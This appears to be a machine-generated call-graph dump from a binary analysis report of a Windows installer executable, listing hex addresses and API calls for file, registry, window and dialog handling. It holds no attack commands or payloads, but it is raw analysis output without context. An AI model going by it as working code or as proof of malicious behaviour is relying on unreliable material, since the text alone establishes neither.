3144->3078 3146 4030b5 CreateDirectoryA 3145->3146 3284 4056e3 3146->3284 3288 4056b4 GetFileAttributesA CreateFileA 3149->3288 3151 402c62 3172 402c72 3151->3172 3289 4059dd lstrcpynA 3151->3289 3153 402c88 3290 405517 lstrlenA 3153->3290 3157 402c99 GetFileSize 3158 402d95 3157->3158 3170 402cb0 3157->3170 3295 402bbe 3158->3295 3160 402d9e 3162 402dce GlobalAlloc 3160->3162 3160->3172 3307 403080 SetFilePointer 3160->3307 3161 40304e ReadFile 3161->3170 3306 403080 SetFilePointer 3162->3306 3164 402e01 3168 402bbe 6 API calls 3164->3168 3166 402db7 3169 40304e ReadFile 3166->3169 3167 402de9 3171 402e5b 37 API calls 3167->3171 3168->3172 3173 402dc2 3169->3173 3170->3158 3170->3161 3170->3164 3170->3172 3174 402bbe 6 API calls 3170->3174 3175 402df5 3171->3175 3172->3087 3173->3162 3173->3172 3174->3170 3175->3172 3175->3175 3176 402e32 SetFilePointer 3175->3176 3176->3172 3178 405cff 3 API calls 3177->3178 3179 40353a 3178->3179 3180 403552 3179->3180 3182 403540 3179->3182 3181 4058c4 3 API calls 3180->3181 3183 403573 3181->3183 3321 40593b wsprintfA 3182->3321 3185 403591 lstrcatA 3183->3185 3187 4058c4 3 API calls 3183->3187 3186 403550 3185->3186 3312 4037ef 3186->3312 3187->3185 3190 4055b1 18 API calls 3191 4035c3 3190->3191 3192 40364c 3191->3192 3194 4058c4 3 API calls 3191->3194 3193 4055b1 18 API calls 3192->3193 3195 403652 3193->3195 3196 4035ef 3194->3196 3197 403662 LoadImageA 3195->3197 3198 4059ff 18 API calls 3195->3198 3196->3192 3201 40360b lstrlenA 3196->3201 3205 4054fb CharNextA 3196->3205 3199 403716 3197->3199 3200 40368d RegisterClassA 3197->3200 3198->3197 3204 40140b 2 API calls 3199->3204 3202 4032b3 3200->3202 3203 4036c9 SystemParametersInfoA CreateWindowExA 3200->3203 3206 403619 lstrcmpiA 3201->3206 3207 40363f 3201->3207 3202->3088 3203->3199 3208 40371c 3204->3208 3210 403609 3205->3210 3206->3207 3211 403629 GetFileAttributesA 3206->3211 3209 4054d0 3 API calls 3207->3209 3208->3202 3212 4037ef 19 API calls 3208->3212 3213 403645 3209->3213 3210->3201 3214 403635 3211->3214 3215 40372d 3212->3215 3322 4059dd lstrcpynA 3213->3322 3214->3207 3217 405517 2 API calls 3214->3217 3218 403739 ShowWindow LoadLibraryA 3215->3218 3219 4037bc 3215->3219 3217->3207 3220 403758 LoadLibraryA 3218->3220 3221 40375f GetClassInfoA 3218->3221 3323 404e4d OleInitialize 3219->3323 3220->3221 3223 403773 GetClassInfoA RegisterClassA 3221->3223 3224 403789 DialogBoxParamA 3221->3224 3223->3224 3226 40140b 2 API calls 3224->3226 3225 4037c2 3227 4037c6 3225->3227 3228 4037de 3225->3228 3231 4037b1 3226->3231 3227->3202 3230 40140b 2 API calls 3227->3230 3229 40140b 2 API calls 3228->3229 3229->3202 3230->3202 3231->3202 3232->3076 3338 4059dd lstrcpynA 3233->3338 3235 4055c2 3236 405564 4 API calls 3235->3236 3237 4055c8 3236->3237 3238 403289 3237->3238 3239 405c3f 5 API calls 3237->3239 3238->3088 3248 4059dd lstrcpynA 3238->3248 3240 4055d8 3239->3240 3240->3238 3245 4055eb 3240->3245 3241 405603 lstrlenA 3242 40560e 3241->3242 3241->3245 3244 4054d0 3 API calls 3242->3244 3243 405cd8 2 API calls 3243->3245 3246 405613 GetFileAttributesA 3244->3246 3245->3238 3245->3241 3245->3243 3247 405517 2 API calls 3245->3247 3246->3238 3247->3241 3248->3119 3249->3090 3250->3111 3251->3132 3253 405cff 3 API calls 3252->3253 3254 405736 3253->3254 3255 405793 GetShortPathNameA 3254->3255 3257 405888 3254->3257 3339 4056b4 GetFileAttributesA CreateFileA 3254->3339 3256 4057a8 3255->3256 3255->3257 3256->3257 3259 4057b0 wsprintfA 3256->3259 3257->3132 3262 4059ff 18 API calls 3259->3262 3260 405777 CloseHandle GetShortPathNameA 3260->3257 3261 40578b 3260->3261 3261->3255 3261->3257 3263 4057d8 3262->3263 3340 4056b4 GetFileAttributesA CreateFileA 3263->3340 3265 4057e5 3265->3257 3266 4057f4 GetFileSize GlobalAlloc 3265->3266 3267 405881 CloseHandle 3266->3267 3268 405812 ReadFile 3266->3268 3267->3257 3268->3267 3269 405826 3268->3269 3269->3267 3341 405629 lstrlenA 3269->3341 3272 405895 3274 405629 4 API calls 3272->3274 3273 40583b 3346 4059dd lstrcpynA 3273->3346 3276 405849 3274->3276 3277 40585c SetFilePointer WriteFile GlobalFree 3276->3277 3277->3267 3279 405278 3278->3279 3280 40526c CloseHandle 3278->3280 3279->3132 3280->3279 3282 401389 2 API calls 3281->3282 3283 401420 3282->3283 3283->3093 3285 4056ee GetTickCount GetTempFileNameA 3284->3285 3286 4030c9 3285->3286 3287 40571a 3285->3287 3286->3078 3287->3285 3287->3286 3288->3151 3289->3153 3291 405524 3290->3291 3292 402c8e 3291->3292 3293 405529 CharPrevA 3291->3293 3294 4059dd lstrcpynA 3292->3294 3293->3291 3293->3292 3294->3157 3296 402bc7 3295->3296 3297 402bdf 3295->3297 3300 402bd0 DestroyWindow 3296->3300 3301 402bd7 3296->3301 3298 402be7 3297->3298 3299 402bef GetTickCount 3297->3299 3308 405d38 3298->3308 3303 402c20 3299->3303 3304 402bfd CreateDialogParamA ShowWindow 3299->3304 3300->3301 3301->3160 3303->3160 3304->3303 3306->3167 3307->3166 3309 405d55 PeekMessageA 3308->3309 3310 402bed 3309->3310 3311 405d4b DispatchMessageA 3309->3311 3310->3160 3311->3309 3313 403803 3312->3313 3330 40593b wsprintfA 3313->3330 3315 403874 3316 4059ff 18 API calls 3315->3316 3317 403880 SetWindowTextA 3316->3317 3318 4035a1 3317->3318 3319 40389c 3317->3319 3318->3190 3319->3318 3320 4059ff 18 API calls 3319->3320 3320->3319 3321->3186 3322->3192 3331 403ddb 3323->3331 3325 404e97 3326 403ddb SendMessageA 3325->3326 3328 404ea9 OleUninitialize 3326->3328 3327 404e70 3327->3325 3334 401389 3327->3334 3328->3225 3330->3315 3332 403df3 3331->3332 3333 403de4 SendMessageA 3331->3333 3332->3327 3333->3332 3336 401390 3334->3336 3335 4013fe 3335->3327 3336->3335 3337 4013cb MulDiv SendMessageA 3336->3337 3337->3336 3338->3235 3339->3260 3340->3265 3342 40565f lstrlenA 3341->3342 3343 405669 3342->3343 3344 40563d lstrcmpiA 3342->3344 3343->3272 3343->3273 3344->3343 3345 405656 CharNextA 3344->3345 3345->3342 3346->3276 3523 404ccb 3524 404cf0 3523->3524 3525 404cd9 3523->3525 3527 404cfe IsWindowVisible 3524->3527 3533 404d15 3524->3533 3526 404cdf 3525->3526 3541 404d59 3525->3541 3530 403ddb SendMessageA 3526->3530 3529 404d0b 3527->3529 3527->3541 3528 404d5f CallWindowProcA 3531 404ce9 3528->3531 3532 40464a 5 API calls 3529->3532 3530->3531 3532->3533 3533->3528 3542 4059dd lstrcpynA 3533->3542 3535 404d44 3543 40593b wsprintfA 3535->3543 3537 404d4b 3538 40140b 2 API calls 3537->3538 3539 404d52 3538->3539 3544 4059dd lstrcpynA 3539->3544 3541->3528 3542->3535 3543->3537 3544->3541 3347 40344c 3348 403464 3347->3348 3349 403456 CloseHandle 3347->3349 3354 403491 3348->3354 3349->3348 3355 40349f 3354->3355 3356 403469 3355->3356 3357 4034a4 FreeLibrary GlobalFree 3355->3357 3358 405302 3356->3358 3357->3356 3357->3357 3359 4055b1 18 API calls 3358->3359 3360 405316 3359->3360 3361 405336 3360->3361 3362 40531f DeleteFileA 3360->3362 3363 40546b 3361->3363 3396 4059dd lstrcpynA 3361->3396 3392 403475 3362->3392 3368 405cd8 2 API calls 3363->3368 3363->3392 3365 405360 3366 405371 3365->3366 3367 405364 lstrcatA 3365->3367 3370 405517 2 API calls 3366->3370 3369 405377 3367->3369 3371 405490 3368->3371 3372 405385 lstrcatA 3369->3372 3373 405390 lstrlenA FindFirstFileA 3369->3373 3370->3369 3374 4054d0 3 API calls 3371->3374 3371->3392 3372->3373 3373->3363 3386 4053b4 3373->3386 3376 40549a 3374->3376 3375 4054fb CharNextA 3375->3386 3377 405695 2 API calls 3376->3377 3378 4054a0 RemoveDirectoryA 3377->3378 3379 4054c2 3378->3379 3380 4054ab 3378->3380 3381 404d7b 25 API calls 3379->3381 3385 404d7b 25 API calls 3380->3385 3380->3392 3381->3392 3382 40544a FindNextFileA 3384 405462 FindClose 3382->3384 3382->3386 3384->3363 3387 4054b9 3385->3387 3386->3375 3386->3382 3388 405695 2 API calls 3386->3388 3391 405302 59 API calls 3386->3391 3393 404d7b 25 API calls 3386->3393 3394 404d7b 25 API calls 3386->3394 3395 40572b 38 API calls 3386->3395 3397 4059dd lstrcpynA 3386->3397 3389 40572b 38 API calls 3387->3389 3390 405417 DeleteFileA 3388->3390 3389->3392 3390->3386 3391->3386 3393->3382 3394->3386 3395->3386 3396->3365 3397->3386 3545 4025cc 3546 4025d3 3545->3546 3547 402838 3545->3547 3553 4029d9 3546->3553 3549 4025de 3550 4025e5 SetFilePointer 3549->3550 3550->3547 3551 4025f5 3550->3551 3556 40593b wsprintfA 3551->3556 3554 4059ff 18 API calls 3553->3554 3555 4029ed 3554->3555 3555->3549 3556->3547 3557 4041cd 3558 40420b 3557->3558 3559 4041fe 3557->3559 3560 404214 GetDlgItem 3558->3560 3567 404277 3558->3567 3618 405282 GetDlgItemTextA 3559->3618 3562 404228 3560->3562 3566 40423c SetWindowTextA 3562->3566 3570 405564 4 API calls 3562->3570 3563 40435b 3615 4044e7 3563->3615 3620 405282 GetDlgItemTextA 3563->3620 3564 404205 3565 405c3f 5 API calls 3564->3565 3565->3558 3571 403d8f 19 API calls 3566->3571 3567->3563 3572 4059ff 18 API calls 3567->3572 3567->3615 3569 403df6 8 API calls 3574 4044fb 3569->3574 3575 404232 3570->3575 3576 40425a 3571->3576 3577 4042ed SHBrowseForFolderA 3572->3577 3573 404387 3578 4055b1 18 API calls 3573->3578 3575->3566 3582 4054d0 3 API calls 3575->3582 3579 403d8f 19 API calls 3576->3579 3577->3563 3580 404305 CoTaskMemFree 3577->3580 3581 40438d 3578->3581 3583 404268 3579->3583 3584 4054d0 3 API calls 3580->3584 3621 4059dd lstrcpynA 3581->3621 3582->3566 3619 403dc4 SendMessageA 3583->3619 3586 404312 3584->3586 3590 404349 SetDlgItemTextA 3586->3590 3593 4059ff 18 API calls 3586->3593 3588 4043a4 3592 405cff 3 API calls 3588->3592 3589 404270 3591 405cff 3 API calls 3589->3591 3590->3563 3591->3567 3600 4043ac 3592->3600 3594 404331 lstrcmpiA 3593->3594 3594->3590 3596 404342 lstrcatA 3594->3596 3595 4043e6 3622 4059dd lstrcpynA 3595->3622 3596->3590 3598 4043ef 3599 405564 4 API calls 3598->3599 3601 4043f5 GetDiskFreeSpaceA 3599->3601 3600->3595 3604 405517 2 API calls 3600->3604 3605 404439 3600->3605 3603 404417 MulDiv 3601->3603 3601->3605 3603->3605 3604->3600 3606 404496 3605->3606 3608 404568 21 API calls 3605->3608 3607 4044b9 3606->3607 3610 40140b 2 API calls 3606->3610 3623 403db1 EnableWindow 3607->3623 3609 404488 3608->3609 3611 404498 SetDlgItemTextA 3609->3611 3612 40448d 3609->3612 3610->3607 3611->3606 3614 404568 21 API calls 3612->3614 3614->3606 3615->3569 3616 4044d5 3616->3615 3624 404162 3616->3624 3618->3564 3619->3589 3620->3573 3621->3588 3622->3598 3623->3616 3625 404170 3624->3625 3626 404175 SendMessageA 3624->3626 3625->3626 3626->3615 3627 401f51 3628 401f63 3627->3628 3629 402012 3627->3629 3630 4029f6 18 API calls 3628->3630 3632 401423 25 API calls 3629->3632 3631 401f6a 3630->3631 3633 4029f6 18 API calls 3631->3633 3637 402169 3632->3637 3634 401f73 3633->3634 3635 401f88 LoadLibraryExA 3634->3635 3636 401f7b GetModuleHandleA 3634->3636 3635->3629 3638 401f98 GetProcAddress 3635->3638 3636->3635 3636->3638 3639 401fe5 3638->3639 3640 401fa8 3638->3640 3641 404d7b 25 API calls 3639->3641 3642 401423 25 API calls 3640->3642 3643 401fb8 3640->3643 3641->3643 3642->3643 3643->3637 3644 402006 FreeLibrary 3643->3644 3644->3637 3645 4014d6 3646 4029d9 18 API calls 3645->3646 3647 4014dc Sleep 3646->3647 3649 40288b 3647->3649 3650 403ed7 3651 403ffa 3650->3651 3652 403eed 3650->3652 3653 404069 3651->3653 3656 40413d 3651->3656 3662 40403e GetDlgItem SendMessageA 3651->3662 3654 403d8f 19 API calls 3652->3654 3655 404073 GetDlgItem 3653->3655 3653->3656 3657 403f43 3654->3657 3660 404089 3655->3660 3661 4040fb 3655->3661 3659 403df6 8 API calls 3656->3659 3658 403d8f 19 API calls 3657->3658 3664 403f50 CheckDlgButton 3658->3664 3665 404138 3659->3665 3660->3661 3666 4040af 6 API calls 3660->3666 3661->3656 3667 40410d 3661->3667 3681 403db1 EnableWindow 3662->3681 3679 403db1 EnableWindow 3664->3679 3666->3661 3670 404113 SendMessageA 3667->3670 3671 404124 3667->3671 3668 404064 3672 404162 SendMessageA 3668->3672 3670->3671 3671->3665 3674 40412a SendMessageA 3671->3674 3672->3653 3673 403f6e GetDlgItem 3680 403dc4 SendMessageA 3673->3680 3674->3665 3676 403f84 SendMessageA 3677 403fa2 GetSysColor 3676->3677 3678 403fab SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3676->3678 3677->3678 3678->3665 3679->3673 3680->3676 3681->3668 3687 4018d8 3688 40190f 3687->3688 3689 4029f6 18 API calls 3688->3689 3690 401914 3689->3690 3691 405302 68 API calls 3690->3691 3692 40191d 3691->3692 3693 4018db 3694 4029f6 18 API calls 3693->3694 3695 4018e2 3694->3695 3696 40529e MessageBoxIndirectA 3695->3696 3697 4018eb 3696->3697 3712 4034e4 3713 4034ef 3712->3713 3714 4034f6 GlobalAlloc 3713->3714 3715 4034f3 3713->3715 3714->3715 3723 401ae5 3724 4029f6 18 API calls 3723->3724 3725 401aec 3724->3725 3726 4029d9 18 API calls 3725->3726 3727 401af5 wsprintfA 3726->3727 3728 40288b 3727->3728 3729 402866 SendMessageA 3730 402880 InvalidateRect 3729->3730 3731 40288b 3729->3731 3730->3731 3732 4019e6 3733 4029f6 18 API calls 3732->3733 3734 4019ef ExpandEnvironmentStringsA 3733->3734 3735 401a03 3734->3735 3737 401a16 3734->3737 3736 401a08 lstrcmpA 3735->3736 3735->3737 3736->3737 3738 402267 3739 4029f6 18 API calls 3738->3739 3740 402275 3739->3740 3741 4029f6 18 API calls 3740->3741 3742 40227e 3741->3742 3743 4029f6 18 API calls 3742->3743 3744 402288 GetPrivateProfileStringA 3743->3744 3745 401c6d 3746 4029d9 18 API calls 3745->3746 3747 401c73 IsWindow 3746->3747 3748 4019d6 3747->3748 3749 4014f0 SetForegroundWindow 3750 40288b 3749->3750 3751 402172 3752 4029f6 18 API calls 3751->3752 3753 402178 3752->3753 3754 4029f6 18 API calls 3753->3754 3755 402181 3754->3755 3756 4029f6 18 API calls 3755->3756 3757 40218a 3756->3757 3758 405cd8 2 API calls 3757->3758 3759 402193 3758->3759 3760 4021a4 lstrlenA lstrlenA 3759->3760 3761 402197 3759->3761 3763 404d7b 25 API calls 3760->3763 3762 404d7b 25 API calls 3761->3762 3765 40219f 3761->3765 3762->3765 3764 4021e0 SHFileOperationA 3763->3764 3764->3761 3764->3765 3766 4021f4 3767 40220e 3766->3767 3768 4021fb 3766->3768 3769 4059ff 18 API calls 3768->3769 3770 402208 3769->3770 3771 40529e MessageBoxIndirectA 3770->3771 3771->3767 3779 4016fa 3780 4029f6 18 API calls 3779->3780 3781 401701 SearchPathA 3780->3781 3782 40171c 3781->3782 3783 4025fb 3784 402602 3783->3784 3785 40288b 3783->3785 3786 402608 FindClose 3784->3786 3786->3785 3787 40267c 3788 4029f6 18 API calls 3787->3788 3790 40268a 3788->3790 3789 4026a0 3792 405695 2 API calls 3789->3792 3790->3789 3791 4029f6 18 API calls 3790->3791 3791->3789 3793 4026a6 3792->3793 3813 4056b4 GetFileAttributesA CreateFileA 3793->3813 3795 4026b3 3796 40275c 3795->3796 3797 4026bf GlobalAlloc 3795->3797 3800 402764 DeleteFileA 3796->3800 3801 402777 3796->3801 3798 402753 CloseHandle 3797->3798 3799 4026d8 3797->3799 3798->3796 3814 403080 SetFilePointer 3799->3814 3800->3801 3803 4026de 3804 40304e ReadFile 3803->3804 3805 4026e7 GlobalAlloc 3804->3805 3806 4026f7 3805->3806 3807 40272b WriteFile GlobalFree 3805->3807 3808 402e5b 37 API calls 3806->3808 3809 402e5b 37 API calls 3807->3809 3812 402704 3808->3812 3810 402750 3809->3810 3810->3798 3811 402722 GlobalFree 3811->3807 3812->3811 3813->3795 3814->3803 3815 4014fe 3816 401506 3815->3816 3817 401519 3815->3817 3818 4029d9 18 API calls 3816->3818 3818->3817 3819 401000 3820 401037 BeginPaint GetClientRect 3819->3820 3821 40100c DefWindowProcA 3819->3821 3822 4010f3 3820->3822 3824 401179 3821->3824 3825 401073 CreateBrushIndirect FillRect DeleteObject 3822->3825 3826 4010fc 3822->3826 3825->3822 3827 401102 CreateFontIndirectA 3826->3827 3828 401167 EndPaint 3826->3828 3827->3828 3829 401112 6 API calls 3827->3829 3828->3824 3829->3828 3830 404502 3831 404512 3830->3831 3832 40452e 3830->3832 3841 405282 GetDlgItemTextA 3831->3841 3834 404561 3832->3834 3835 404534 SHGetPathFromIDListA 3832->3835 3837 40454b SendMessageA 3835->3837 3838 404544 3835->3838 3836 40451f SendMessageA 3836->3832 3837->3834 3839 40140b 2 API calls 3838->3839 3839->3837 3841->3836 3842 402303 3843 402309 3842->3843 3844 4029f6 18 API calls 3843->3844 3845 40231b 3844->3845 3846 4029f6 18 API calls 3845->3846 3847 402325 RegCreateKeyExA 3846->3847 3848 40234f 3847->3848 3849 40288b 3847->3849 3850 402367 3848->3850 3851 4029f6 18 API calls 3848->3851 3852 402373 3850->3852 3855 4029d9 18 API calls 3850->3855 3854 402360 lstrlenA 3851->3854 3853 40238e RegSetValueExA 3852->3853 3856 402e5b 37 API calls 3852->3856 3857 4023a4 RegCloseKey 3853->3857 3854->3850 3855->3852 3856->3853 3857->3849 3859 402803 3860 4029d9 18 API calls 3859->3860 3861 402809 3860->3861 3862 402817 3861->3862 3863 40283a 3861->3863 3864 40265c 3861->3864 3862->3864 3867 40593b wsprintfA 3862->3867 3863->3864 3865 4059ff 18 API calls 3863->3865 3865->3864 3867->3864 3868 401b06 3869 401b13 3868->3869 3870 401b57 3868->3870 3873 4021fb 3869->3873 3878 401b2a 3869->3878 3871 401b80 GlobalAlloc 3870->3871 3872 401b5b 3870->3872 3874 4059ff 18 API calls 3871->3874 3886 401b9b 3872->3886 3889 4059dd lstrcpynA 3872->3889 3875 4059ff 18 API calls 3873->3875 3874->3886 3877 402208 3875->3877 3882 40529e MessageBoxIndirectA 3877->3882 3887 4059dd lstrcpynA 3878->3887 3879 401b6d GlobalFree 3879->3886 3881 401b39 3888 4059dd lstrcpynA 3881->3888 3882->3886 3884 401b48 3890 4059dd lstrcpynA 3884->3890 3887->3881 3888->3884 3889->3879 3890->3886 3891 402506 3892 4029d9 18 API calls 3891->3892 3894 402510 3892->3894 3893 402586 3894->3893 3895 402544 ReadFile 3894->3895 3896 402588 3894->3896 3898 402598 3894->3898 3895->3893 3895->3894 3900 40593b wsprintfA 3896->3900 3898->3893 3899 4025ae SetFilePointer 3898->3899 3899->3893 3900->3893 3901 404186 3902 404196 3901->3902 3903 4041bc 3901->3903 3904 403d8f 19 API calls 3902->3904 3905 403df6 8 API calls 3903->3905 3906 4041a3 SetDlgItemTextA 3904->3906 3907 4041c8 3905->3907 3906->3903 3061 401389 3063 401390 3061->3063 3062 4013fe 3063->3062 3064 4013cb MulDiv SendMessageA 3063->3064 3064->3063 3908 401c8a 3909 4029d9 18 API calls 3908->3909 3910 401c91 3909->3910 3911 4029d9 18 API calls 3910->3911 3912 401c99 GetDlgItem 3911->3912 3913 4024b8 3912->3913 3927 401490 3928 404d7b 25 API calls 3927->3928 3929 401497 3928->3929 3930 402615 3931 402618 3930->3931 3932 402630 3930->3932 3933 402625 FindNextFileA 3931->3933 3933->3932 3934 40266f 3933->3934 3936 4059dd lstrcpynA 3934->3936 3936->3932 3937 401595 3938 4029f6 18 API calls 3937->3938 3939 40159c SetFileAttributesA 3938->3939 3940 4015ae 3939->3940 3941 401d95 3942 4029d9 18 API calls 3941->3942 3943 401d9b 3942->3943 3944 4029d9 18 API calls 3943->3944 3945 401da4 3944->3945 3946 401db6 EnableWindow 3945->3946 3947 401dab ShowWindow 3945->3947 3948 40288b 3946->3948 3947->3948 3949 401e95 3950 4029f6 18 API calls 3949->3950 3951 401e9c 3950->3951 3952 405cd8 2 API calls 3951->3952 3953 401ea2 3952->3953 3955 401eb4 3953->3955 3956 40593b wsprintfA 3953->3956 3956->3955 3957 401696 3958 4029f6 18 API calls 3957->3958 3959 40169c GetFullPathNameA 3958->3959 3960 4016b3 3959->3960 3966 4016d4 3959->3966 3963 405cd8 2 API calls 3960->3963 3960->3966 3961 4016e8 GetShortPathNameA 3962 40288b 3961->3962 3964 4016c4 3963->3964 3964->3966 3967 4059dd lstrcpynA 3964->3967 3966->3961 3966->3962 3967->3966 3968 401d1b GetDC GetDeviceCaps 3969 4029d9 18 API calls 3968->3969 3970 401d37 MulDiv 3969->3970 3971 4029d9 18 API calls 3970->3971 3972 401d4c 3971->3972 3973 4059ff 18 API calls 3972->3973 3974 401d85 CreateFontIndirectA 3973->3974 3975 4024b8 3974->3975 3976 401e1b 3977 4029f6 18 API calls 3976->3977 3978 401e21 3977->3978 3979 404d7b 25 API calls 3978->3979 3980 401e2b 3979->3980 3981 40523d 2 API calls 3980->3981 3982 401e31 3981->3982 3983 401e87 CloseHandle 3982->3983 3984 40265c 3982->3984 3985 401e50 WaitForSingleObject 3982->3985 3989 405d38 2 API calls 3982->3989 3983->3984 3985->3982 3986 401e5e GetExitCodeProcess 3985->3986 3987 401e70 3986->3987 3988 401e79 3986->3988 3991 40593b wsprintfA 3987->3991 3988->3983 3989->3985 3991->3988 3999 40249c 4000 4029f6 18 API calls 3999->4000 4001 4024a3 4000->4001 4004 4056b4 GetFileAttributesA CreateFileA 4001->4004 4003 4024af 4004->4003 4005 402020 4006 4029f6 18 API calls 4005->4006 4007 402027 4006->4007 4008 4029f6 18 API calls 4007->4008 4009 402031 4008->4009 4010 4029f6 18 API calls 4009->4010 4011 40203a 4010->4011 4012 4029f6 18 API calls 4011->4012 4013 402044 4012->4013 4014 4029f6 18 API calls 4013->4014 4015 40204e 4014->4015 4016 402062 CoCreateInstance 4015->4016 4017 4029f6 18 API calls 4015->4017 4020 402081 4016->4020 4021 402137 4016->4021 4017->4016 4018 401423 25 API calls 4019 402169 4018->4019 4020->4021 4022 402116 MultiByteToWideChar 4020->4022 4021->4018 4021->4019 4022->4021 4023 401721 4024 4029f6 18 API calls 4023->4024 4025 401728 4024->4025 4026 4056e3 2 API calls 4025->4026 4027 40172f 4026->4027 4027->4027 4028 401922 4029 4029f6 18 API calls 4028->4029 4030 401929 lstrlenA 4029->4030 4031 4024b8 4030->4031 4032 402223 4033 40222b 4032->4033 4036 402231 4032->4036 4034 4029f6 18 API calls 4033->4034 4034->4036 4035 402241 4038 40224f 4035->4038 4039 4029f6 18 API calls 4035->4039 4036->4035 4037 4029f6 18 API calls 4036->4037 4037->4035 4040 4029f6 18 API calls 4038->4040 4039->4038 4041 402258 WritePrivateProfileStringA 4040->4041 4042 403ea3 lstrcpynA lstrlenA 4043 401ca5 4044 4029d9 18 API calls 4043->4044 4045 401cb5 SetWindowLongA 4044->4045 4046 40288b 4045->4046 4047 401a26 4048 4029d9 18 API calls 4047->4048 4049 401a2c 4048->4049 4050 4029d9 18 API calls 4049->4050 4051 4019d6 4050->4051 4052 402427 4062 402b00 4052->4062 4054 402431 4055 4029d9 18 API calls 4054->4055 4056 40243a 4055->4056 4057 402451 RegEnumKeyA 4056->4057 4058 40245d RegEnumValueA 4056->4058 4060 40265c 4056->4060 4059 402476 RegCloseKey 4057->4059 4058->4059 4058->4060 4059->4060 4063 4029f6 18 API calls 4062->4063 4064 402b19 4063->4064 4065 402b27 RegOpenKeyExA 4064->4065 4065->4054 4066 4022a7 4067 4022d7 4066->4067 4068 4022ac 4066->4068 4069 4029f6 18 API calls 4067->4069 4070 402b00 19 API calls 4068->4070 4072 4022de 4069->4072 4071 4022b3 4070->4071 4073 4029f6 18 API calls 4071->4073 4076 4022f4 4071->4076 4077 402a36 RegOpenKeyExA 4072->4077 4074 4022c4 RegDeleteValueA RegCloseKey 4073->4074 4074->4076 4084 402aad 4077->4084 4085 402a61 4077->4085 4078 402a87 RegEnumKeyA 4079 402a99 RegCloseKey 4078->4079 4078->4085 4081 405cff 3 API calls 4079->4081 4080 402abe RegCloseKey 4080->4084 4083 402aa9 4081->4083 4082 402a36 3 API calls 4082->4085 4083->4084 4086 402ad9 RegDeleteKeyA 4083->4086 4084->4076 4085->4078 4085->4079 4085->4080 4085->4082 4086->4084 4087 405fa8 4089 405e2c 4087->4089 4088 406797 4089->4088 4090 405eb6 GlobalAlloc 4089->4090 4091 405ead GlobalFree 4089->4091 4092 405f24 GlobalFree 4089->4092 4093 405f2d GlobalAlloc 4089->4093 4090->4088 4090->4089 4091->4090 4092->4093 4093->4088 4093->4089 4094 401bad 4095 4029d9 18 API calls 4094->4095 4096 401bb4 4095->4096 4097 4029d9 18 API calls 4096->4097 4098 401bbe 4097->4098 4099 401bce 4098->4099 4100 4029f6 18 API calls 4098->4100 4101 401bde 4099->4101 4102 4029f6 18 API calls 4099->4102 4100->4099 4103 401be9 4101->4103 4104 401c2d 4101->4104 4102->4101 4105 4029d9 18 API calls 4103->4105 4106 4029f6 18 API calls 4104->4106 4108 401bee 4105->4108 4107 401c32 4106->4107 4109 4029f6 18 API calls 4107->4109 4110 4029d9 18 API calls 4108->4110 4111 401c3b FindWindowExA 4109->4111 4112 401bf7 4110->4112 4115 401c59 4111->4115 4113 401c1d SendMessageA 4112->4113 4114 401bff SendMessageTimeoutA 4112->4114 4113->4115 4114->4115 4116 4023af 4117 402b00 19 API calls 4116->4117 4118 4023b9 4117->4118 4119 4029f6 18 API calls 4118->4119 4120 4023c2 4119->4120 4121 4023cc RegQueryValueExA 4120->4121 4125 40265c 4120->4125 4122 4023f2 RegCloseKey 4121->4122 4123 4023ec 4121->4123 4122->4125 4123->4122 4127 40593b wsprintfA 4123->4127 4127->4122 2949 4015b3 2950 4029f6 18 API calls 2949->2950 2951 4015ba 2950->2951 2967 405564 CharNextA CharNextA 2951->2967 2953 40160a 2955 40162d 2953->2955 2956 40160f 2953->2956 2954 4054fb CharNextA 2957 4015d0 CreateDirectoryA 2954->2957 2960 401423 25 API calls 2955->2960 2958 401423 25 API calls 2956->2958 2959 4015e5 GetLastError 2957->2959 2964 4015c2 2957->2964 2961 401616 2958->2961 2963 4015f2 GetFileAttributesA 2959->2963 2959->2964 2966 402169 2960->2966 2973 4059dd lstrcpynA 2961->2973 2963->2964 2964->2953 2964->2954 2965 401621 SetCurrentDirectoryA 2965->2966 2968 40557e 2967->2968 2972 40558a 2967->2972 2969 405585 CharNextA 2968->2969 2968->2972 2970 4055a7 2969->2970 2970->2964 2971 4054fb CharNextA 2971->2972 2972->2970 2972->2971 2973->2965 2974 401734 2975 4029f6 18 API calls 2974->2975 2976 40173b 2975->2976 2977 401761 2976->2977 2978 401759 2976->2978 3040 4059dd lstrcpynA 2977->3040 3039 4059dd lstrcpynA 2978->3039 2981 40175f 2985 405c3f 5 API calls 2981->2985 2982 40176c 3041 4054d0 lstrlenA CharPrevA 2982->3041 2998 40177e 2985->2998 2986 401789 2990 401795 CompareFileTime 2986->2990 2986->2998 3044 405cd8 FindFirstFileA 2986->3044 2990->2986 2991 401859 2992 404d7b 25 API calls 2991->2992 2993 401863 2992->2993 3017 402e5b 2993->3017 2994 404d7b 25 API calls 2997 401845 2994->2997 2995 4059dd lstrcpynA 2995->2998 2998->2986 2998->2991 2998->2995 3001 4059ff 18 API calls 2998->3001 3011 401830 2998->3011 3013 405695 GetFileAttributesA 2998->3013 3016 4056b4 GetFileAttributesA CreateFileA 2998->3016 3047 40529e 2998->3047 3000 40188a SetFileTime 3002 40189c CloseHandle 3000->3002 3001->2998 3002->2997 3003 4018ad 3002->3003 3004 4018b2 3003->3004 3005 4018c5 3003->3005 3006 4059ff 18 API calls 3004->3006 3007 4059ff 18 API calls 3005->3007 3009 4018ba lstrcatA 3006->3009 3010 4018cd 3007->3010 3009->3010 3012 40529e MessageBoxIndirectA 3010->3012 3011->2994 3011->2997 3012->2997 3014 4056b1 3013->3014 3015 4056a4 SetFileAttributesA 3013->3015 3014->2998 3015->3014 3016->2998 3019 402e71 3017->3019 3018 402e9c 3051 40304e ReadFile 3018->3051 3019->3018 3060 403080 SetFilePointer 3019->3060 3023 402fe2 3025 402fe6 3023->3025 3030 402ffe 3023->3030 3024 402eb9 GetTickCount 3035 402ecc 3024->3035 3027 40304e ReadFile 3025->3027 3026 401876 3026->3000 3026->3002 3027->3026 3028 40304e ReadFile 3028->3030 3029 40304e ReadFile 3029->3035 3030->3026 3030->3028 3031 403019 WriteFile 3030->3031 3031->3026 3032 40302e 3031->3032 3032->3026 3032->3030 3034 402f32 GetTickCount 3034->3035 3035->3026 3035->3029 3035->3034 3036 402f5b MulDiv wsprintfA 3035->3036 3037 402f99 WriteFile 3035->3037 3053 405df9 3035->3053 3038 404d7b 25 API calls 3036->3038 3037->3026 3037->3035 3038->3035 3039->2981 3040->2982 3042 401772 lstrcatA 3041->3042 